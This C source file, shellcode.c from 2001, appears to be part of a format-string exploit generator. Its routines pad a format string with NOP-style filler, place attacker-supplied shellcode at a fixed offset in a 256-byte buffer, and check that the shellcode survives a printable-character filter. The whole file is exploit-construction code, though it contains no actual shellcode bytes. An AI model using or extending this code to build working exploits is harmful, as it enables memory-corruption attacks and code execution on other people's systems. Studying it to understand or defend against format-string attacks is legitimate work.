/*
 * shellcode.c - routines to handle the shellcode.
 * 
 * Copyright (C) 2001 - fish stiqz <fish@analog.org>
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "common.h"


/*
 * adds the shellcode and nops to the end of the format string.
 */
char *add_shellcode(char *fmt_str, char *code, char *anop)
{
    char *new_fmt_str = Realloc(fmt_str, 256 * sizeof(char));
    unsigned int limit = 255 - 16 - 4, i;

    if(strlen(fmt_str) + strlen(code) > limit)
    {
	print_err("shellcode is too large, size is %u and needs to be < %u\n",
		  strlen(code), limit - strlen(fmt_str));
	free(new_fmt_str);
	exit(EXIT_FAILURE);
    }

    for(i = strlen(new_fmt_str); i + strlen(anop) < limit; i += strlen(anop))
	strcat(new_fmt_str, anop);
    
    strcpy(&new_fmt_str[limit - strlen(code)], code);
    return new_fmt_str;
}


/* 
 * checks that the shellcode will remain intact after it is
 * filtered thru make_printable_string.
 */
int check_shellcode(char *code)
{
    char *c_code = make_printable_string(code, strlen(code), 0);
    unsigned int i = 0, r = 1;

    if(strlen(c_code) != strlen(code))
	return 0;

    for(i = 0; i < strlen(code); i++)
    {
	if(code[i] != c_code[i] || c_code[i] == '/')
	{
	    r = 0; 
	    break;
	}
    }

    free(c_code);
    return r;
}
